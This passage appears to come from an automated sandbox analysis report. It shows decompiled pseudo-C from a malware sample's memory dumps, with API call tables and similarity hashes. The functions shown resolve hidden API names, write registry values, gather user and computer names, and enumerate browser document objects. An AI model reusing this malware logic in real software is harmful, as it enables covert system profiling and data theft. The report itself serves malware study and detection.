                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							goto L8;
                                                                                                                          						} else {
                                                                                                                          							_t33 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          							_t7 = _t33 + 0x497e4ce; // 0x6e55775a
                                                                                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                          							 *(_t54 + 0x14) = _t35;
                                                                                                                          							if(_t35 == 0) {
                                                                                                                          								goto L8;
                                                                                                                          							} else {
                                                                                                                          								_t36 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          								_t9 = _t36 + 0x497e406; // 0x4e6c7452
                                                                                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                          								 *(_t54 + 0x18) = _t38;
                                                                                                                          								if(_t38 == 0) {
                                                                                                                          									goto L8;
                                                                                                                          								} else {
                                                                                                                          									_t39 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          									_t11 = _t39 + 0x497e792; // 0x6c43775a
                                                                                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                          									 *(_t54 + 0x1c) = _t41;
                                                                                                                          									if(_t41 == 0) {
                                                                                                                          										goto L8;
                                                                                                                          									} else {
                                                                                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                          										_t44 = E04979269(_t54, _a8);
                                                                                                                          										_v8 = _t44;
                                                                                                                          										if(_t44 != 0) {
                                                                                                                          											goto L8;
                                                                                                                          										} else {
                                                                                                                          											 *_a12 = _t54;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0497101C,?,00000001,?,?,00000000,00000000), ref: 0497485C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0497487E
                                                                                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04974894
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049748AA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049748C0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049748D6
                                                                                                                            • Part of subcall function 04979269: memset.NTDLL ref: 049792E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1886625739-0
                                                                                                                          • Opcode ID: a7ce4778b34008d42ceaa4e6af25003e0b4166803e2202be4e4a6a7aa47b19d8
                                                                                                                          • Instruction ID: 13b47f9e443097aabdd32ef01ccd1c3c49b625bbbe88c41b88b315543aecf234
                                                                                                                          • Opcode Fuzzy Hash: a7ce4778b34008d42ceaa4e6af25003e0b4166803e2202be4e4a6a7aa47b19d8
                                                                                                                          • Instruction Fuzzy Hash: F5216BB060060BAFEB20DF69D848E6ABBECEF44B44B004476E545D7212E774FE05CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0497282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                          				signed int _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int* _v16;
                                                                                                                          				char _v284;
                                                                                                                          				void* __esi;
                                                                                                                          				char* _t59;
                                                                                                                          				intOrPtr* _t60;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				char _t65;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				intOrPtr _t69;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				void* _t73;
                                                                                                                          				signed int _t81;
                                                                                                                          				void* _t91;
                                                                                                                          				void* _t92;
                                                                                                                          				char _t98;
                                                                                                                          				signed int* _t100;
                                                                                                                          				intOrPtr* _t101;
                                                                                                                          				void* _t102;
                                                                                                                          
                                                                                                                          				_t92 = __ecx;
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				_t98 = _a16;
                                                                                                                          				if(_t98 == 0) {
                                                                                                                          					__imp__( &_v284,  *0x497d37c);
                                                                                                                          					_t91 = 0x80000002;
                                                                                                                          					L6:
                                                                                                                          					_t59 = E04971922( &_v284,  &_v284);
                                                                                                                          					_a8 = _t59;
                                                                                                                          					if(_t59 == 0) {
                                                                                                                          						_v8 = 8;
                                                                                                                          						L29:
                                                                                                                          						_t60 = _a20;
                                                                                                                          						if(_t60 != 0) {
                                                                                                                          							 *_t60 =  *_t60 + 1;
                                                                                                                          						}
                                                                                                                          						return _v8;
                                                                                                                          					}
                                                                                                                          					_t101 = _a24;
                                                                                                                          					if(E04975C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                          						L27:
                                                                                                                          						E04974AAB(_a8);
                                                                                                                          						goto L29;
                                                                                                                          					}
                                                                                                                          					_t64 =  *0x497d2b0; // 0x6ff9b38
                                                                                                                          					_t16 = _t64 + 0xc; // 0x6ff9c06
                                                                                                                          					_t65 = E04971922(_t64,  *_t16);
                                                                                                                          					_a24 = _t65;
                                                                                                                          					if(_t65 == 0) {
                                                                                                                          						L14:
                                                                                                                          						_t29 = _t101 + 0x14; // 0x102
                                                                                                                          						_t33 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          						if(E04974A6D(_t97,  *_t33, _t91, _a8,  *0x497d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                          							_t68 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          							if(_t98 == 0) {
                                                                                                                          								_t35 = _t68 + 0x497ea48; // 0x4d4c4b48
                                                                                                                          								_t69 = _t35;
                                                                                                                          							} else {
                                                                                                                          								_t34 = _t68 + 0x497ea43; // 0x55434b48
                                                                                                                          								_t69 = _t34;
                                                                                                                          							}
                                                                                                                          							if(E04975F64(_t69,  *0x497d374,  *0x497d378,  &_a24,  &_a16) == 0) {
                                                                                                                          								if(_t98 == 0) {
                                                                                                                          									_t71 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          									_t44 = _t71 + 0x497e83e; // 0x74666f53
                                                                                                                          									_t73 = E04971922(_t44, _t44);
                                                                                                                          									_t99 = _t73;
                                                                                                                          									if(_t73 == 0) {
                                                                                                                          										_v8 = 8;
                                                                                                                          									} else {
                                                                                                                          										_t47 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          										E04975DDA( *_t47, _t91, _a8,  *0x497d378, _a24);
                                                                                                                          										_t49 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          										E04975DDA( *_t49, _t91, _t99,  *0x497d370, _a16);
                                                                                                                          										E04974AAB(_t99);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t40 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          									E04975DDA( *_t40, _t91, _a8,  *0x497d378, _a24);
                                                                                                                          									_t43 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          									E04975DDA( *_t43, _t91, _a8,  *0x497d370, _a16);
                                                                                                                          								}
                                                                                                                          								if( *_t101 != 0) {
                                                                                                                          									E04974AAB(_a24);
                                                                                                                          								} else {
                                                                                                                          									 *_t101 = _a16;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          					_t21 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          					_t81 = E049763F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                          					if(_t81 == 0) {
                                                                                                                          						_t100 = _v16;
                                                                                                                          						if(_v12 == 0x28) {
                                                                                                                          							 *_t100 =  *_t100 & _t81;
                                                                                                                          							_t26 = _t101 + 0x10; // 0x3d0497c0
                                                                                                                          							E04974A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                          						}
                                                                                                                          						E04974AAB(_t100);
                                                                                                                          						_t98 = _a16;
                                                                                                                          					}
                                                                                                                          					E04974AAB(_a24);
                                                                                                                          					goto L14;
                                                                                                                          				}
                                                                                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                          					goto L29;
                                                                                                                          				} else {
                                                                                                                          					_t97 = _a8;
                                                                                                                          					E0497A938(_t98, _a8,  &_v284);
                                                                                                                          					__imp__(_t102 + _t98 - 0x117,  *0x497d37c);
                                                                                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                          					_t91 = 0x80000003;
                                                                                                                          					goto L6;
                                                                                                                          				}
                                                                                                                          			}
























                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(04972197,0000005F,00000000,00000000,00000104), ref: 0497285E
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 0497288B
                                                                                                                            • Part of subcall function 04971922: lstrlen.KERNEL32(?,00000000,06FF9B38,00000000,049774FF,06FF9D16,?,?,?,?,?,69B25F44,00000005,0497D00C), ref: 04971929
                                                                                                                            • Part of subcall function 04971922: mbstowcs.NTDLL ref: 04971952
                                                                                                                            • Part of subcall function 04971922: memset.NTDLL ref: 04971964
                                                                                                                            • Part of subcall function 04975DDA: lstrlenW.KERNEL32(?,?,?,049729F4,3D0497C0,80000002,04972197,0497258B,74666F53,4D4C4B48,0497258B,?,3D0497C0,80000002,04972197,?), ref: 04975DFF
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 049728AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                          • String ID: ($\
                                                                                                                          • API String ID: 3924217599-1512714803
                                                                                                                          • Opcode ID: 4a4a929556cac061bcdcb68f9642d0f4035df5b2487a83c96e7ebad343ee059d
                                                                                                                          • Instruction ID: cec94201deefe599b4880ffb769aba9049a8b06145169046814e7bb6ce37cff2
                                                                                                                          • Opcode Fuzzy Hash: 4a4a929556cac061bcdcb68f9642d0f4035df5b2487a83c96e7ebad343ee059d
                                                                                                                          • Instruction Fuzzy Hash: 41517D71210609FFEF269F60DD80EAA3BBAFF84314F108574FA1596161E739E925DB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0497137A() {
                                                                                                                          				long _v8;
                                                                                                                          				long _v12;
                                                                                                                          				int _v16;
                                                                                                                          				long _t39;
                                                                                                                          				long _t43;
                                                                                                                          				signed int _t47;
                                                                                                                          				short _t51;
                                                                                                                          				signed int _t52;
                                                                                                                          				int _t56;
                                                                                                                          				int _t57;
                                                                                                                          				char* _t64;
                                                                                                                          				short* _t67;
                                                                                                                          
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				GetUserNameW(0,  &_v8);
                                                                                                                          				_t39 = _v8;
                                                                                                                          				if(_t39 != 0) {
                                                                                                                          					_v12 = _t39;
                                                                                                                          					_v8 = 0;
                                                                                                                          					GetComputerNameW(0,  &_v8);
                                                                                                                          					_t43 = _v8;
                                                                                                                          					if(_t43 != 0) {
                                                                                                                          						_v12 = _v12 + _t43 + 2;
                                                                                                                          						_t64 = E049775F6(_v12 + _t43 + 2 << 2);
                                                                                                                          						if(_t64 != 0) {
                                                                                                                          							_t47 = _v12;
                                                                                                                          							_t67 = _t64 + _t47 * 2;
                                                                                                                          							_v8 = _t47;
                                                                                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                          								L7:
                                                                                                                          								E04974AAB(_t64);
                                                                                                                          							} else {
                                                                                                                          								_t51 = 0x40;
                                                                                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                          								_t52 = _v8;
                                                                                                                          								_v12 = _v12 - _t52;
                                                                                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                          									goto L7;
                                                                                                                          								} else {
                                                                                                                          									_t56 = _v12 + _v8;
                                                                                                                          									_t31 = _t56 + 2; // 0x4974565
                                                                                                                          									_v12 = _t56;
                                                                                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                          									_v8 = _t57;
                                                                                                                          									if(_t57 == 0) {
                                                                                                                          										goto L7;
                                                                                                                          									} else {
                                                                                                                          										_t64[_t57] = 0;
                                                                                                                          										_v16 = _t64;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _v16;
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04974563), ref: 0497138E
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,04974563), ref: 049713AA
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04974563), ref: 049713E4
                                                                                                                          • GetComputerNameW.KERNEL32(04974563,?), ref: 04971407
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04974563,00000000,04974565,00000000,00000000,?,?,04974563), ref: 0497142A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850880919-0
                                                                                                                          • Opcode ID: 708d60c791e27f6c5142a9b3bdef87d2a3565ff70eb4f6aa9fdae02036aeff8b
                                                                                                                          • Instruction ID: 9aed837f6efa79c1bc7a62c8546122299d406a9e20a309f57b7a3ff69a172afd
                                                                                                                          • Opcode Fuzzy Hash: 708d60c791e27f6c5142a9b3bdef87d2a3565ff70eb4f6aa9fdae02036aeff8b
                                                                                                                          • Instruction Fuzzy Hash: 7621B5B6900208FFDB11DFE9D985DEEBBBDEF44304B5044AAE501E7200EA34AB45DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04971A24(intOrPtr _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          				unsigned int _t4;
                                                                                                                          				void* _t5;
                                                                                                                          				long _t6;
                                                                                                                          				void* _t7;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                          				 *0x497d2a4 = _t2;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				_t4 = GetVersion();
                                                                                                                          				if(_t4 != 5) {
                                                                                                                          					L4:
                                                                                                                          					if(_t15 <= 0) {
                                                                                                                          						_t5 = 0x32;
                                                                                                                          						return _t5;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					 *0x497d294 = _t4;
                                                                                                                          					_t6 = GetCurrentProcessId();
                                                                                                                          					 *0x497d290 = _t6;
                                                                                                                          					 *0x497d29c = _a4;
                                                                                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                          					 *0x497d28c = _t7;
                                                                                                                          					if(_t7 == 0) {
                                                                                                                          						 *0x497d28c =  *0x497d28c | 0xffffffff;
                                                                                                                          					}
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				if(_t4 >> 8 > 0) {
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          				_t15 = _t4 - _t4;
                                                                                                                          				goto L4;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04972669,?,?,00000001,?,?,?,04971900,?), ref: 04971A2C
                                                                                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A3B
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A57
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04971900,?), ref: 04971A74
                                                                                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04971A93
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2270775618-0
                                                                                                                          • Opcode ID: ac7719e9559e4591cb0061a6181c97e1c2e5a9420ca583b2582f9f08cc35a5e7
                                                                                                                          • Instruction ID: 61ec083c69f7981f830c763a909cf136cd8c0989353fa873f924d44234b5ec2e
                                                                                                                          • Opcode Fuzzy Hash: ac7719e9559e4591cb0061a6181c97e1c2e5a9420ca583b2582f9f08cc35a5e7
                                                                                                                          • Instruction Fuzzy Hash: 5CF04474648302EBEB248F24AC1BB253F69EB44751F00473AE606DA2D0E778E842DF59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 049732AE
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04973393
                                                                                                                            • Part of subcall function 04975920: SysAllocString.OLEAUT32(0497C2B0), ref: 04975970
                                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 049733E6
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 049733F5
                                                                                                                            • Part of subcall function 04973D39: Sleep.KERNEL32(000001F4), ref: 04973D81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3193056040-0
                                                                                                                          • Opcode ID: f7e98c0f1882a3787e5e89a4d26cbb8f4272d0aced3cd8fcd0935d08dc48d2dd
                                                                                                                          • Instruction ID: adbe444ff76f70dc3f113e1ed773953b0d558fe2c9ace77772c9161c375c2b88
                                                                                                                          • Opcode Fuzzy Hash: f7e98c0f1882a3787e5e89a4d26cbb8f4272d0aced3cd8fcd0935d08dc48d2dd
                                                                                                                          • Instruction Fuzzy Hash: F9513E76600609EFDB21DFA8C844A9EB7BAFFC8704B148879E905DB210DB75ED06DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E04975920(intOrPtr* __eax) {
                                                                                                                          				void* _v8;
                                                                                                                          				WCHAR* _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				char _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _v32;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				short _v48;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				short _v64;
                                                                                                                          				intOrPtr* _t54;
                                                                                                                          				intOrPtr* _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				intOrPtr* _t58;
                                                                                                                          				intOrPtr* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          				intOrPtr* _t63;
                                                                                                                          				intOrPtr* _t65;
                                                                                                                          				short _t67;
                                                                                                                          				intOrPtr* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr* _t72;
                                                                                                                          				intOrPtr* _t75;
                                                                                                                          				intOrPtr* _t77;
                                                                                                                          				intOrPtr _t79;
                                                                                                                          				intOrPtr* _t83;
                                                                                                                          				intOrPtr* _t87;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				intOrPtr _t109;
                                                                                                                          				void* _t118;
                                                                                                                          				void* _t122;
                                                                                                                          				void* _t123;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          
                                                                                                                          				_t123 = _t122 - 0x3c;
                                                                                                                          				_push( &_v8);
                                                                                                                          				_push(__eax);
                                                                                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                          				if(_t118 >= 0) {
                                                                                                                          					_t54 = _v8;
                                                                                                                          					_t103 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t5 = _t103 + 0x497e038; // 0x3050f485
                                                                                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                          					_t56 = _v8;
                                                                                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                          					if(_t118 >= 0) {
                                                                                                                          						__imp__#2(0x497c2b0);
                                                                                                                          						_v28 = _t57;
                                                                                                                          						if(_t57 == 0) {
                                                                                                                          							_t118 = 0x8007000e;
                                                                                                                          						} else {
                                                                                                                          							_t60 = _v32;
                                                                                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                          							_t87 = __imp__#6;
                                                                                                                          							_t118 = _t61;
                                                                                                                          							if(_t118 >= 0) {
                                                                                                                          								_t63 = _v24;
                                                                                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                          								if(_t118 >= 0) {
                                                                                                                          									_t130 = _v20;
                                                                                                                          									if(_t130 != 0) {
                                                                                                                          										_t67 = 3;
                                                                                                                          										_v64 = _t67;
                                                                                                                          										_v48 = _t67;
                                                                                                                          										_v56 = 0;
                                                                                                                          										_v40 = 0;
                                                                                                                          										if(_t130 > 0) {
                                                                                                                          											while(1) {
                                                                                                                          												_t68 = _v24;
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												_t123 = _t123;
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												asm("movsd");
                                                                                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                          												if(_t118 < 0) {
                                                                                                                          													goto L16;
                                                                                                                          												}
                                                                                                                          												_t70 = _v8;
                                                                                                                          												_t109 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          												_t28 = _t109 + 0x497e0bc; // 0x3050f1ff
                                                                                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                          												if(_t118 >= 0) {
                                                                                                                          													_t75 = _v16;
                                                                                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                          														_t79 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          														_t33 = _t79 + 0x497e078; // 0x76006f
                                                                                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                          															_t83 = _v16;
                                                                                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                          														}
                                                                                                                          														 *_t87(_v12);
                                                                                                                          													}
                                                                                                                          													_t77 = _v16;
                                                                                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                          												}
                                                                                                                          												_t72 = _v8;
                                                                                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                          												_v40 = _v40 + 1;
                                                                                                                          												if(_v40 < _v20) {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          												goto L16;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L16:
                                                                                                                          								_t65 = _v24;
                                                                                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                          							}
                                                                                                                          							 *_t87(_v28);
                                                                                                                          						}
                                                                                                                          						_t58 = _v32;
                                                                                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t118;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(0497C2B0), ref: 04975970
                                                                                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04975A51
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04975A6A
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 04975A99
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Free$Alloclstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1885612795-0
                                                                                                                          • Opcode ID: aa558398361aa8e31c402671e88b515309c74cbf305c03b98636f7cd3b2fe3e0
                                                                                                                          • Instruction ID: 1b81837d8854610549a136db8765aa8ee1c524587dfec7eeac6824575c156ae9
                                                                                                                          • Opcode Fuzzy Hash: aa558398361aa8e31c402671e88b515309c74cbf305c03b98636f7cd3b2fe3e0
                                                                                                                          • Instruction Fuzzy Hash: AF515D75D00519EFCF05DFA8C8888AEB7B9FFC8710B1585A8E915EB210D731AD42CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E04977B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				void _v156;
                                                                                                                          				void _v428;
                                                                                                                          				void* _t55;
                                                                                                                          				unsigned int _t56;
                                                                                                                          				signed int _t66;
                                                                                                                          				signed int _t74;
                                                                                                                          				void* _t76;
                                                                                                                          				signed int _t79;
                                                                                                                          				void* _t81;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t96;
                                                                                                                          				signed int* _t99;
                                                                                                                          				signed int _t101;
                                                                                                                          				signed int _t103;
                                                                                                                          				void* _t107;
                                                                                                                          
                                                                                                                          				_t92 = _a12;
                                                                                                                          				_t101 = __eax;
                                                                                                                          				_t55 = E049747C4(_a16, _t92);
                                                                                                                          				_t79 = _t55;
                                                                                                                          				if(_t79 == 0) {
                                                                                                                          					L18:
                                                                                                                          					return _t55;
                                                                                                                          				}
                                                                                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                          				_t81 = 0;
                                                                                                                          				_t96 = 0x20;
                                                                                                                          				if(_t56 == 0) {
                                                                                                                          					L4:
                                                                                                                          					_t97 = _t96 - _t81;
                                                                                                                          					_v12 = _t96 - _t81;
                                                                                                                          					E0497227C(_t79,  &_v428);
                                                                                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04973C06(_t101,  &_v428, _a8, _t96 - _t81);
